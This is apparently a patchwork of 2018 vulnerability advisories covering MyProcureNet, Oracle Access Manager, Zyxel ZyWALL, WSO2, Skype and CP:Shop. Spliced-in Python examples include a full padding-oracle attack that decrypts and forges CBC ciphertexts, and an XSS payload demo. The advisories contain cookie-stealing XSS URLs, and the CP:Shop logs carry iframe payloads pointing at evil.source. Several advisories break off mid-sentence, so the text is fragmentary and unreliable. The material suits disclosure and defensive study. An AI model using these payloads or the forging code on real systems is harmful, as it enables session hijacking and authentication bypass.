> The identified vulnerabilities can be exploited after authentication but
> the registration for the application is usually open for anyone.
>
> 1. Arbitrary File Upload
> A malicious file can be uploaded to the webserver by an attacker. It is
> possible for an attacker to upload a script to issue operating system
> commands.
>
> This vulnerability occurs because an attacker is able to adjust the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
> extensions to the whitelist during the upload.
>
> For instance, if the extension .asp is added to the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
> accepts "secctest.asp" as a legitimate file. Hence malicious files can be
> uploaded in order to execute arbitrary commands to take over the server.
>
>
> 2. Reflected Cross-site scripting
> This vulnerability within "ProxyPage.aspx" allows an attacker to inject
> malicious client side scripting which will be executed in the browser of
> users if they visit the manipulated site.
>
>
> Proof of concept:
> -
> The proof of concept has been removed as no patch is available.
>
>
> Vulnerable / tested versions:
> -
> MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable.
> This was the latest version available at the time of the test.
>
>
> Vendor contact timeline:
>
> 2018-02-22: Contacting vendor through i...@mybiz.net (no response)
> 2018-02-27: Request update from vendor (no response)
> 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
> (no response)
> 2018-05-14: Public release of security advisory
>
>
> Solution:
> -----
> None
>
>
> Workaround:
> ---
> None
>
>
> Advisory URL:
> -
> https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
>
> ~~~~~~~~
SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
===
title: Arbitrary File Upload & Cross-site scripting
product: MyBiz MyProcureNet
vulnerable version: 5.0.0
fixed version: unknown
CVE number: -
impact: Critical
homepage: http://www.mybiz.net/
found: 2018-01-29
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
    Fikri Fadzil (Office Singapore)
    Wan Ikram (Office Kuala Lumpur)
    Jasveer Singh (Office Kuala Lumpur)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"MyBiz is a company fixated on developing technology which transforms the way business is done online. At the intersection of what one business needs from another is the potential for value to be created differently. This intersection for the exchange of value requires technology but in fundamentally very different ways from traditional enterprise systems. MyBiz believes that the chemistry of business is the business relationships between enterprises. The strength of the business relationship drives the success and future of the business. MyBiz believes that these business relationships need to be captured and orchestrated. MyBiz developed our proprietary Business Relationship Network engine, a platform to capture business relationships as data to drive new business services which create value efficiently."

Source: http://www.mybiz.net/copy-of-our-story

Business recommendation:
---
The vendor did not reply to our inquiries since February 2018, hence the issues might still exist in current versions.

SEC Consult recommends not to use this product until a thorough security review has been performed by security professionals and all identified issues have been resolved. It is assumed that MyBiz products are affected by further critical security issues.
Vulnerability overview/description:
---
The identified vulnerabilities can be exploited after authentication, but registration for the application is usually open to anyone.

1. Arbitrary File Upload
A malicious file can be uploaded to the web server by an attacker. It is possible for an attacker to upload a script that issues operating system commands.

This vulnerability occurs because an attacker is able to adjust the "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary extensions to the whitelist during the upload. The list of accepted extensions is therefore controlled by the client rather than by the server.

For instance, if the extension .asp is added to the "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server accepts "secctest.asp" as a legitimate file. Hence malicious files can be uploaded in order to execute arbitrary commands and take over the server.

2. Reflected Cross-site scripting
This vulnerability within "ProxyPage.aspx" allows an attacker to inject malicious client-side script which will be executed in the browser of users if they visit the manipulated site.

Proof of concept:
---
The proof of concept has been removed as no patch is available.

Vulnerable / tested versions:
---
MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. This was the latest version available at the time of the test.

Vendor contact timeline:
---
2018-02-22: Contacting vendor through i...@mybiz.net (no response)
2018-02-27: Request update from vendor (no response)
2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us (no response)
2018-05-14: Public release of security advisory

Solution:
---
None

Workaround:
---
None

Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult.
It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC C
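The upload flaw in the MyProcureNet advisory above, as an added example (this is not MyBiz's code): a reconstruction of the broken check, in which the client-supplied "HiddenFieldControlCustomWhiteListedExtensions" field extends the allowlist, next to a hardened check whose allowlist is owned by the server. The parameter name is taken from the advisory; its comma-separated format, the set of executable ASP.NET/IIS extensions, the allowlist contents and the random storage name are assumptions made for the example.

```python
"""Upload extension validation: client-extendable allowlist vs server-owned one.

Added example, not MyBiz's code. Only the hidden-field name comes from the
advisory; formats, allowlists and helper names are assumptions.
"""
import posixpath
import secrets

# Owned by the server. Nothing in the request can extend it (assumed contents).
SERVER_ALLOWED = frozenset({"pdf", "png", "jpg", "jpeg", "gif", "docx", "xlsx"})

# Suffixes an IIS/ASP.NET host would hand to a script engine or that change the
# application itself (assumed list for an .aspx application like the one above).
EXECUTABLE = frozenset({"asp", "aspx", "ashx", "asmx", "asax", "cshtml",
                        "config", "php", "jsp"})

# Parameter name from the advisory; its format (comma-separated) is assumed.
CLIENT_LIST_FIELD = "HiddenFieldControlCustomWhiteListedExtensions"


def _basename(filename: str) -> str:
    # Normalise separators, then strip trailing dots and spaces, which Windows
    # and IIS drop when the file is written ("shell.aspx." becomes "shell.aspx").
    return posixpath.basename(filename.replace("\\", "/")).rstrip(". ")


def vulnerable_is_allowed(filename: str, form: dict) -> bool:
    """Reconstruction of the flawed check: the hidden field extends the allowlist."""
    allowed = set(SERVER_ALLOWED)
    custom = form.get(CLIENT_LIST_FIELD, "")
    allowed.update(e.strip().lstrip(".").lower() for e in custom.split(",") if e.strip())
    name = _basename(filename)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext in allowed


def hardened_is_allowed(filename: str, form: dict) -> bool:
    """Fixed check. 'form' is accepted only to show that it is ignored."""
    name = _basename(filename)
    if not name or ";" in name or "\x00" in name:
        return False  # "shell.asp;.jpg" (old IIS) and NUL-truncation tricks
    parts = name.lower().split(".")
    if len(parts) < 2 or any(p in EXECUTABLE for p in parts[1:]):
        return False  # rejects shell.aspx and shell.aspx.jpg alike
    return parts[-1] in SERVER_ALLOWED


def storage_name(filename: str) -> str:
    """Never store under the client's name: random name, validated extension."""
    if not hardened_is_allowed(filename, {}):
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + "." + _basename(filename).rsplit(".", 1)[-1].lower()


if __name__ == "__main__":
    request = {CLIENT_LIST_FIELD: ".asp"}  # what the attacker sends
    print("vulnerable:", vulnerable_is_allowed("secctest.asp", request))
    print("hardened:  ", hardened_is_allowed("secctest.asp", request))
```

Beyond ignoring the client field, the hardened check looks at every dotted segment of the name, strips the trailing dot and space that IIS discards, and stores the file under a random name so that even an accepted extension cannot be used to overwrite an existing file.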
SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)
We have published an accompanying blog post to this technical advisory with further information:
Blog: https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/
Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ

SEC Consult Vulnerability Lab Security Advisory < 20180503-0 >
===
title: Authentication Bypass
product: Oracle Access Manager
vulnerable version: 11.1.2.3.0, 12.2.1.3.0
fixed version: April 2018 CPU
CVE number: CVE-2018-2879
impact: Critical
homepage: https://www.oracle.com/
found: 2017-11
by: W. Ettlinger (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"Oracle Access Management provides innovative new services that complement traditional access management capabilities. It not only provides Web SSO with MFA, coarse grained authorization and session management but also provides standard SAML Federation and OAuth capabilities to enable secure access to external cloud and mobile applications. It can be easily integrated with the Oracle Identity Cloud Service to support hybrid access management capabilities that can help customers to seamlessly protect on-premise and cloud applications and workloads."

URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html

Business recommendation:
---
SEC Consult did not conduct a full security audit as only a cryptographic implementation was analyzed. However, since the vulnerability was found in such a central component of the OAM, we suspect that an insufficient amount of attention has been given to information security. Given the central position in an organization's security infrastructure, we recommend Oracle's customers to either conduct a full audit of the component or to request the results of such audits from Oracle.

The security patches from the Oracle CPU April 2018 have to be applied immediately!
Vulnerability overview/description:
---
Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM) is vulnerable to an authentication bypass vulnerability. An attacker can abuse this vulnerability to log in to any resource protected by the OAM using any user account, even administrative accounts! This security vulnerability completely breaks the main functionality of the OAM product.

An attacker can create a scenario in which the OAM replies differently depending on whether the PKCS#7 padding of an encrypted message is valid or invalid. This behavior can be used to mount a padding oracle attack. An attacker can decrypt and encrypt several messages used to communicate between the OAM and web servers. The attack described here allows an attacker to create arbitrary authentication cookies which are accepted by the OAM.

Proof of concept:
---
A successful user authentication with Oracle Access Manager (OAM) involves the following steps:

1. The user accesses a protected resource.
2. A component in the web server (the Oracle Webgate) answers this request with a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM in a URL parameter.
3. The user authenticates against the OAM (e.g. with username and password).
4. The OAM redirects the user back to the web server. Information about the successful login is passed in the parameter "encreply".
5. The web server redirects the user to the resource that was initially requested. An encrypted authentication token is stored in a cookie (OAMAuthnCookie).
6. The authentication token in the OAMAuthnCookie cookie is used from now on to authenticate the user.

All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted with a CBC cipher using the same key. This key is shared between the OAM and the web server.

The attack exploits step 2 of the authentication process: the attacker sends manipulated "encquery" parameters and observes the server's response.
The following shows an example of a decrypted encquery:

salt=sF/vMVV0Gkr/k+IhbrXYWg==
wh=agentid
wu=%2F
wo=1
rh=http://server:
ru=%2F
reqtime=151000
ctx=
validate=

where
* the "salt" is a randomly generated value
* "validate" is a hash over certain parts of the message (MD5)

To conduct a padding oracle attack, an attacker would modify the second-to-last encrypted block of an encrypted message. Most of the time, this causes the padding in the decrypted message to be invalid. In case the padding is accepted, the attacker gains information about the p
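The attack sketched above, carried through as an added example that is not SEC Consult's or Oracle's code: CBC with PKCS#7 padding over a toy keyed block cipher standing in for the cipher shared between OAM and Webgate, a simulated endpoint that reports nothing but whether the padding was accepted, byte-wise recovery of a block's decryption by manipulating the block fed in before it, and the reverse direction, forging a ciphertext for a chosen plaintext without the key, which is what makes arbitrary OAMAuthnCookie values possible. The cipher, the key, the message contents and the oracle's interface are assumptions; the real encquery also carries the MD5 "validate" field, which this example does not model.

```python
"""Padding-oracle attack against CBC/PKCS#7, modelled on the OAM encquery case.

Added example, not SEC Consult's or Oracle's code. The block cipher is a toy
keyed Feistel network standing in for the real cipher; the attack only uses
the oracle's accept/reject answer and never looks inside the cipher.
"""
import hashlib
import hmac

BLOCK = 16  # byte length of one cipher block


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    # Round function of the toy cipher: keyed hash of round index and one half.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS#7 padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, cur), prev)
        prev = cur
    return pkcs7_unpad(out)


class PaddingOracle:
    """Stand-in for the OAM endpoint receiving 'encquery': per request the
    attacker learns only whether the padding was accepted (assumed interface)."""

    def __init__(self, key: bytes) -> None:
        self._key = key
        self.queries = 0

    def accepts(self, iv: bytes, ciphertext: bytes) -> bool:
        self.queries += 1
        try:
            cbc_decrypt(self._key, iv, ciphertext)
            return True
        except ValueError:
            return False


def recover_intermediate(oracle: PaddingOracle, target: bytes) -> bytes:
    """Recover D_k(target) byte by byte by manipulating the block fed in as the
    preceding block (the "second-to-last block" of the advisory)."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        probe = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            probe[j] = inter[j] ^ pad  # known bytes forced to the pad value
        for guess in range(256):
            probe[pos] = guess
            if not oracle.accepts(bytes(probe), target):
                continue
            if pos == BLOCK - 1:
                # Edge case: a decrypted tail of 0x02 0x02 (or longer) is also
                # valid padding. Flip the byte before it: a genuine 0x01 stays
                # valid, a 0x02 0x02 false positive does not.
                probe[pos - 1] ^= 0xFF
                still_ok = oracle.accepts(bytes(probe), target)
                probe[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("no padding accepted: not a padding oracle?")
    return bytes(inter)


def oracle_decrypt(oracle: PaddingOracle, iv: bytes, ciphertext: bytes) -> bytes:
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(recover_intermediate(oracle, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)


def oracle_encrypt(oracle: PaddingOracle, plaintext: bytes):
    """Forge (iv, ciphertext) for a chosen plaintext without the key: start
    from an arbitrary last block and choose each preceding block so that
    D_k(block) XOR preceding == wanted plaintext block."""
    padded = pkcs7_pad(plaintext)
    chain = [bytes(BLOCK)]  # arbitrary final ciphertext block
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        chain.append(_xor(recover_intermediate(oracle, chain[-1]), padded[i:i + BLOCK]))
    chain.reverse()
    return chain[0], b"".join(chain[1:])


if __name__ == "__main__":
    key = b"key shared by OAM and Webgate"  # never seen by the attacker
    oracle = PaddingOracle(key)
    iv = bytes(range(BLOCK))
    encquery = cbc_encrypt(key, iv, b"wh=agentid wu=%2F wo=1 reqtime=151000")
    print(oracle_decrypt(oracle, iv, encquery), oracle.queries, "queries")
    forged_iv, forged_ct = oracle_encrypt(oracle, b"wh=agentid wu=%2Fadmin")
    print(cbc_decrypt(key, forged_iv, forged_ct))
```

Recovering one 16-byte block costs about 128 oracle requests per byte on average (the class counts them), so both directions are practical against any endpoint whose response distinguishes bad padding from a bad message. The defence is the usual one: authenticate the ciphertext (an HMAC or an AEAD mode) and verify it before any decryption or padding check, so that every malformed message produces the same response.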
SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 >
===
title: Reflected Cross-Site Scripting
product: Zyxel ZyWALL: see "Vulnerable / tested version"
vulnerable version: ZLD 4.30 and before
fixed version: ZLD 4.31
CVE number: -
impact: Medium
homepage: https://www.zyxel.com
found: 2018-02-05
by: T. Weber (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

Business recommendation:
---
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues.

Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (XSS)
A reflected cross-site scripting vulnerability was identified in 'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is returned without any sanitization of the input.
An attacker can, for example, exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the device.

Proof of concept:
---
1) Reflected Cross-Site Scripting (XSS)
By opening the following link, the contents of the 'arip' and 'zy_pc_browser' cookies will be displayed.

http:///free_time_failed.cgi?err_msg=alert(document.cookie);
https:///free_time_failed.cgi?err_msg=alert(document.cookie);

Vulnerable / tested versions:
---
The following versions are affected:
Zyxel ZyWall USG 110       ZLD 4.30 and earlier
Zyxel ZyWall USG 210       ZLD 4.30 and earlier
Zyxel ZyWall USG 310       ZLD 4.30 and earlier
Zyxel ZyWall USG 1100      ZLD 4.30 and earlier
Zyxel ZyWall USG 1900      ZLD 4.30 and earlier
Zyxel ZyWall USG 2200-VPN  ZLD 4.30 and earlier

Vendor contact timeline:
---
2018-02-07: Contacting vendor through secur...@zyxel.com.tw
2018-02-08: Vendor responded with contact information and a PGP key. Sent the encrypted advisory to the contact.
2018-02-09: Contact confirmed that the advisory was received.
2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL series is vulnerable to the reported vulnerability. The contact also stated that the vulnerability will be fixed by the end of March. Requested more information regarding version numbers and other affected devices.
2018-02-23: Contact confirmed that the devices are vulnerable in firmware version 4.30 and before.
2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31 and that it will be released on 2018-04-17. Shifted release of advisory to 2018-04-17.
2018-04-12: Informed the contact that the advisory will be released in a few days.
2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new version on the customer portal. E-mail was blocked and returned.
2018-04-18: Found the new version (ZLD 4.31) on the customer portal.
2018-04-24: Advisory release.
Solution:
---
Install firmware version ZLD 4.31 from the vendor's website to fix this issue:
https://www.zyxel.com/support/download_landing.shtml

Workaround:
---
Restrict network access to the device.

Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
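The reflected XSS above, and the output-encoding fix that equally applies to the stored XSS advisories further down this page (WSO2, CP:Shop, Weblication, AEF), as an added example that is not Zyxel's or any other vendor's code. It models what the advisory describes for free_time_failed.cgi: the 'err_msg' parameter is copied into the page unencoded. The page template, the query parsing, the constructed payload and the URL-attribute case (a stored URL such as the WSO2 worker host) are assumptions made for the example.

```python
"""Reflected XSS through a query parameter, and the output-encoding fix.

Added example, not Zyxel's (or any other vendor's) code. Template, parsing,
payload and the URL-attribute helper are assumptions for the example.
"""
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload in the style of the advisories on this page.
PAYLOAD = '"><iframe src="evil.source" onload=alert(document.cookie)>'


def attack_query(payload: str = PAYLOAD) -> str:
    """Query string an attacker would append to free_time_failed.cgi?"""
    return "err_msg=" + quote(payload, safe="")


def _err_msg(query_string: str) -> str:
    return parse_qs(query_string, keep_blank_values=True).get("err_msg", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """The flaw: the parameter is interpolated into HTML verbatim."""
    return "<p>Free time login failed: %s</p>" % _err_msg(query_string)


def render_fixed(query_string: str) -> str:
    """HTML-body context: entity-encode &, <, > and both quote characters before
    interpolating. The payload becomes inert text; nothing has to be stripped."""
    return "<p>Free time login failed: %s</p>" % html.escape(_err_msg(query_string), quote=True)


def render_link_fixed(url: str) -> str:
    """Attribute context, e.g. a stored worker-host URL. Entity encoding alone
    leaves a 'javascript:' URL intact, so the scheme is validated as well."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        raise ValueError("only absolute http(s) URLs are accepted")
    safe = html.escape(url, quote=True)
    return '<a href="%s">%s</a>' % (safe, safe)


# Unencoded tag or inline event handler in the output. Used only to show the
# difference between the two renderers; not a filter to rely on in production.
_ACTIVE = re.compile(r"<\s*(script|iframe|img|svg|object)\b|<[^>]*\bon[a-z]+\s*=", re.I)


def has_active_markup(rendered: str) -> bool:
    return _ACTIVE.search(rendered) is not None


if __name__ == "__main__":
    q = attack_query()
    for render in (render_vulnerable, render_fixed):
        page = render(q)
        print(render.__name__, has_active_markup(page), page)
```

Encoding is chosen per output context: html.escape covers text and quoted attributes, but a value that ends up in a URL attribute, a script block or a CSS property needs the encoder for that context, and for URLs a scheme check before any encoding.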
SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
===
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Europe | Asia | North America
    https://www.sec-consult.com
===

Vendor description:
---
"WSO2 Carbon redefines middleware by providing an integrated and componentized middleware platform that adapts to the specific needs of any enterprise IT project - on premise or in the cloud. 100% open source and standards-based, WSO2 Carbon enables developers to rapidly orchestrate business processes, compose applications and develop services using WSO2 Developer Studio and a broad range of business and technical services that integrate with legacy, packaged and SaaS applications. The lean, complete, OSGi-based platform includes more than 175 components – OSGi bundles or Carbon features. The WSO2 Carbon core framework functions as “Eclipse for servers” and includes common capabilities shared by all WSO2 products, such as built-in registry, user management, transports, security, logging, clustering, caching and throttling services, co-ordination, and a GUI framework."

Source: https://wso2.com/products/carbon/

"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to rapidly create visually appealing and engaging web components such as dashboards, and gadgets, and unlocking data for business intelligence and monitoring. With the host of capabilities that Dashboard Server provides out-of-the-box, going from data to screen has never been easier."
Source: https://wso2.com/products/dashboard-server/

Business recommendation:
---
SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by end users to manage their accounts, change passwords, alter their profiles, or change certain settings. An attacker is able to inject arbitrary JavaScript payloads into various text boxes (username, home address, last name, first name, etc.). The payloads are permanently stored in the dashboard and triggered every time the dashboard is visited.

The payload is also potentially triggered in the Carbon part of WSO2, which means that an attacker would be able to inject payloads from the front-end application into a middleware application that is not accessible from the internet, and thereby attack administrators.

2) Stored Cross-Site Scripting in WSO2 Carbon
The Carbon UI offers a feature to add multiple BPS worker hosts. In the worker host URL an arbitrary JavaScript payload can be injected and permanently stored in the web application.

Proof of concept:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly injected:
- Firstname
- Lastname
- Username
- Address

It is suspected that all user inputs are returned unfiltered in all server responses.

2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set the URL to the following payload:

">

Every time the Carbon middleware application is accessed, the payload is triggered.

Vulnerable / tested versions:
---
The following version has been tested, which was the most recent version at the time of discovery:
* WSO2IS 5.3.0

Vendor contact timeline:
---
2018-01-25: Contacting vendor through secur...@wso2.com
2018-02-08: Asking for status update.
            Vendor responds that they are still investigating the issue.
2018-02-21: Vendor responds with release date and further details concerning the nature of the vulnerabilities. The XSS in the Carbon component was a duplicate and should already be fixed. Concerning the XSS in the dashboard, a fix is implemented and will be rolled out with the release of WSO2 Identity Server 5.5.0.
2018-03-14: Requesting CVE from MITRE for the stored XSS in the Dashboard.
2018-03-15: MITRE assigned CVE-2018-8716.
2018-03-26: Vendor informed us that the final release of the updated software will be o
Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability
inside by a resize of the image (view demo video)
8. Now the message with the smilies must be quoted or copied and then transferred to any other Skype input field where smilies are supported
9. Pasting around 50 of them results in unexpected memory errors, uncaught exceptions or access violations
   Note: Tested on Samsung Android and Apple iOS devices. The resize of the larger image results in a memory corruption
10. Successful reproduction of the vulnerability!

PoC Video: Shows the local issue and the remotely triggered bug ...
https://www.youtube.com/watch?v=2vcdQb98zE0

Solution - Fix & Patch:
===
Secure the memory allocation when resizing emoticon images during the rendering of transfers in the Skype mobile software client.

Microsoft resolved the vulnerability and prepared the updated versions v8.17 & v8.18. In both versions the security issue is known as patched.

Security Risk:
==
The security risk of the vulnerability in the Skype mobile software client for iOS and Android is estimated as medium (CVSS 4.7).

Credits & Authors:
==
Benjamin Kunz Mejri [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Section:magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities
ssed=yes]
   Connection[keep-alive]
Response Header:
   server[Apache/2.4.27]
   x-powered-by[PHP/7.0.20]
   expires[Thu, 19 Nov 1981 08:52:00 GMT]
   cache-control[no-store, no-cache, must-revalidate]
   pragma[no-cache]
   x-frame-options[SAMEORIGIN]
   content-encoding[gzip]
   set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/]
   content-type[text/html; charset=utf-8]
   X-Firefox-Spdy[h2]
-
Status: 302[Found]
GET https://cpshop.localhost:8080/evil.source
Mime Type[text/html]
Request Header:
   Host[cpshop.localhost:8080]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
   Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
   Accept-Language[de,en-US;q=0.7,en;q=0.3]
   Accept-Encoding[gzip, deflate, br]
   Referer[https://cpshop.localhost:8080admin.php]
   Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]
   Connection[keep-alive]
   Upgrade-Insecure-Requests[1]
Response Header:
   server[Apache/2.4.27]
   location[http://cpshop.localhost:8080]
   content-length[296]
   content-type[text/html; charset=iso-8859-1]
   X-Firefox-Spdy[h2]
-
Status: pending[]
GET http://cpshop.localhost:8080/cpshop/admin.php?file=news=yes=yes%5Bsearch%5D= http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B onl%5Bvar%5D=1%5Bposter%5D=0%5Bcategory%5D=0=news
Mime Type[unknown]
Request Header:
   Host[cpshop.localhost:8080]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
   Accept[*/*]
   Accept-Language[de,en-US;q=0.7,en;q=0.3]
   Accept-Encoding[gzip, deflate]
   X-Requested-With[XMLHttpRequest]
   Referer[http://cpshop.localhost:8080/cpshop/admin.php]
   Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
   DNT[1]
-
14:06:37.847[179ms][total 538ms]
Status: 200[OK]
GET http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl%5Bvar%5D=1%5Bposter%5D=0%5Bcategory%5D=0=news
Mime Type[text/html]
Request Header:
